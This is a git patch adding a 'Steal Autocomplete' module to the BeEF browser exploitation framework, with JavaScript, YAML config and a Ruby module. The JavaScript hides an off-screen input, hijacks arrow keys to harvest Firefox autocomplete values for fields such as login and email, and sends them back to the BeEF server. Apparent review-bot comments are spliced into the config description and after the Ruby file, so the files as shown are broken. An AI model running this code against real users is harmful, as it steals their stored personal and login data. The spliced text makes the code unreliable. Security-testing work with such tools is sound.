From 19d1827c362f48561fc3756dc9aa8ca880c2140d Mon Sep 17 00:00:00 2001
From: bcoles
Date: Sun, 3 Feb 2013 08:51:04 +1030
Subject: [PATCH] Add 'Steal Autocomplete' module Part of issue #601
---
 .../autocomplete_theft/command.js | 75 +++++++++++++++++++
 .../autocomplete_theft/config.yaml | 16 ++++
 .../autocomplete_theft/module.rb | 49 ++++++++++++
 3 files changed, 140 insertions(+)
 create mode 100644 modules/social_engineering/autocomplete_theft/command.js
 create mode 100644 modules/social_engineering/autocomplete_theft/config.yaml
 create mode 100644 modules/social_engineering/autocomplete_theft/module.rb
diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js
new file mode 100644
index 000000000..ffcb1677c
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ steal_autocomplete = function() {
+
+ var results = [];
+
+ // hijack keys and set focus
+ get_autocomplete = function (){
+ window.addEventListener("keydown",function(e){
+ switch(e.keyCode) {
+ case 37: // left
+ scrollTo(window.pageXOffset-20, window.pageYOffset);
+ break;
+ case 38: // up
+ scrollTo(window.pageXOffset, window.pageYOffset-20);
+ break;
+ case 39: // right
+ scrollTo(window.pageXOffset+20, window.pageYOffset);
+ break;
+ case 40: // down
+ scrollTo(window.pageXOffset, window.pageYOffset+20);
+ break;
+ default:break;
+ }
+ },false);
+ document.getElementById("placeholder").focus();
+
+ }
+
+ inArray = function(el, arr){
+ for (var i = 0;i < arr.length;i++)
+ if (el===arr[i])
+ return true;
+ return false;
+ }
+
+ steal = function(n,v) {
+ var val = JSON.stringify({'input':n,'value':v});
+ if (v != "" && !inArray(val,results)){
+ results.push(val);
+ //console.log(val);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
+ }
+ }
+
+ tt = function(ev) {
+ if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100);
+ }
+
+ // create hidden input element
+ input = document.createElement('input');
+ input.setAttribute("id", "placeholder");
+ input.setAttribute("name", "<%= @input_name %>");
+ input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;");
+ input.setAttribute("type", "text");
+ input.onkeyup = function(event) { tt(event); }
+ input.onkeydown = function(event) { tt(event); }
+ input.onblur = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); }
+ document.body.appendChild(input);
+
+ // steal autocomplete
+ get_autocomplete();
+
+ }
+
+ setTimeout("steal_autocomplete();", 100);
+
+});
+
diff --git a/modules/social_engineering/autocomplete_theft/config.yaml b/modules/social_engineering/autocomplete_theft/config.yaml
new file mode 100644
index 000000000..b79eac020
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ steal_autocomplete:
+ enable: true
+ category: "Social Engineering"
+ name: "Steal Autocomplete"
+ description: "This module steals autocomplete values from Firefox. The user must press the up or down arrow keys twice, followed by the left or right arrow key, in order to steal autocomplete information.
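Review bot: `steal_autocomplete`, `get_autocomplete`, `inArray`, `steal`, `tt` and `input` in command.js are all assigned without `var`, so each one becomes a property of the hooked page's `window` and overwrites any page variable of the same name. The string form `setTimeout("steal_autocomplete();", 100)` is what forces the outer function to be global, because the string is evaluated in global scope. Declaring the names locally, `var steal_autocomplete = function() {`, and passing the reference, `setTimeout(steal_autocomplete, 100);`, keeps the module's state inside the `beef.execute` closure. The `keydown` listener registered on `window` in `get_autocomplete` is also never removed, so the page under test keeps the extra scroll handler after `onblur` has deleted the input element.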
Hint: Try convincing the user to enter the Konami code (Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter)."
+ authors: ["Stefano Di Paola", "bcoles"]
+ target:
+ working: ["FF"]
+ not_working: ["ALL"]
diff --git a/modules/social_engineering/autocomplete_theft/module.rb b/modules/social_engineering/autocomplete_theft/module.rb
new file mode 100644
index 000000000..45ab2f35d
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/module.rb
@@ -0,0 +1,49 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# Based on the PoC by Stefano Di Paola
+# Ported to BeEF by bcoles
+# For more information see: http://blog.mindedsecurity.com/2011/10/autocompleteagain.html
+################################################################################
+class Steal_autocomplete < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'input_name',
+ 'type' => 'combobox',
+ 'ui_label' => 'Input Field Name',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['element_name'],
+ 'store_data' => [
+ ['login'],
+ ['email'],
+ ['Email'],
+ ['session[username_or_email]'],
+ ['q'],
+ ['search'],
+ ['name'],
+ ['company'],
+ ['city'],
+ ['state'],
+ ['country'],
+ ],
+ 'emptyText' => 'Select an input field name to steal autocomplete values',
+ 'valueField' => 'element_name',
+ 'displayField' => 'element_name',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['results'] = @datastore['results']
+ save content
+ end
+
+end
+
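Review bot: `post_execute` in module.rb saves `@datastore['results']` exactly as received, and that string originates in the hooked browser, so from the point of view of the BeEF server and its operator console it is untrusted input. Nothing in this hunk checks that it is the `{'input':…,'value':…}` JSON that command.js builds, or bounds its length; whether the console escapes it on display is not visible here and should be confirmed. At minimum the method deserves a comment such as `# results is untrusted, browser-supplied JSON; never render unescaped`. The `input_name` option has the mirror problem on the way out: command.js interpolates it into a double-quoted JavaScript string (`"<%= @input_name %>"`), so a value containing `"` or `\` would break the generated script, and how the combobox treats typed-in values is not shown in this hunk.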